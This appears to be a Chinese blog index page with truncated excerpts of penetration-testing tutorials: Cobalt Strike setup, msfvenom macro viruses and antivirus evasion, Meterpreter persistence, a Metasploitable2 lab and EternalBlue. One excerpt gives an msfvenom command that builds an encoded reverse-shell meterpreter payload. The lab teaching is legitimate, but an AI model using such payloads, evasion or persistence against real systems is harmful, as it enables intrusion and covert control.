CobaltStrike 安装&启动
安装&启动 Server 端 ll 查看目录结构 chmod +x teamserver 赋权 ./teamserver 192.168.225.128 admin 启动 192.168.225.128 是服务端本机的 IP(即 Kali 的 IP) admin 是一个自定义的登录密码,可以自行更改 启动报错 如果遇到 Address al…
CobaltStrike 简介
简介 Cobalt Strike 是美国 Red Team 开发的渗透测试工具。是以 Metasploit 为基础的 GUI 框架式工具,集成了端口转发、服务扫描、自动化溢出、多模式端口监听、木马生成、木马捆绑、钓鱼攻击、信息收集等模块 官网:https://www.cobaltstrike.com 网盘下载:https://pan.baidu.c…
Msfvenom 宏文件病毒
前提条件 windows 目标机器安装 office(以 office 2007 为例) 下载地址:https://pan.baidu.com/s/18fE7oGUwxDwi9P_2GdQtHA?pwd=q5ew Windows 安装 office 2007 解压,运行 setup.exe,输入激活码,其余默认即可 Msfvenom 生成 vba …
Msfvenom 免杀
在线杀软检测:virscan.com 混合编码 混合多次编码 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.225.128 lport=4444 -b "\x00" -e x86/shikata_ga_nai…
Msfvenom 客户端渗透
Windows 恶意软件 msfvenom 介绍 msfvenom 是 msfpayload 和 msfencode 的结合,可以利用其生成木马程序,在目标机器上执行,在本地监听上线。 msfvenom 使用 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp …
Meterpreter 预留持久化后门
注册表权限驻留 meterpreter getshell 略 meterpreter windows persistence bg 挂起 session show payload 查看可用 payloads use exploit/windows/local/persistence 切换 payload show options 查看参数 设置参数…
Meterpreter 简介与常用命令
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后得攻击载荷使用,攻击载荷在溢出攻击成功以后会返回一个控制通道。 使用它作为攻击载荷能够获得目标系统的一个 Meterpreter Shell 链接。 Meterpreter Shell 作为渗透模块有很多有用的功能,比如添加用户、隐藏文件、打开 shell、获取…
MetasploitTable2 靶机渗透
简介 这是个专门匹配 msf 演示的 Linux 操作系统,暴露了很多高危端口,也存在一些高危漏洞。 下载地址 https://pan.baidu.com/s/1shixJeI1Ca4D0WpI5GUV8w?pwd=sfk5 下载后是个压缩包,直接解压,使用 vmware 打开即可 默认的用户名密码: msfadmin/msfadmin 使用 su…
传奇经典——永恒之蓝(MS17-010)
介绍 永恒之蓝是2017年4月14日晚黑客团体Shadow Brokers公布的一大批网络攻击工具其中的一个。是利用 Windows 系统的 SMB(Server Message Book 网络协议) 漏洞可以获取系统最高权限。 5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英俄、欧洲以及中国多个高校内网、大型企…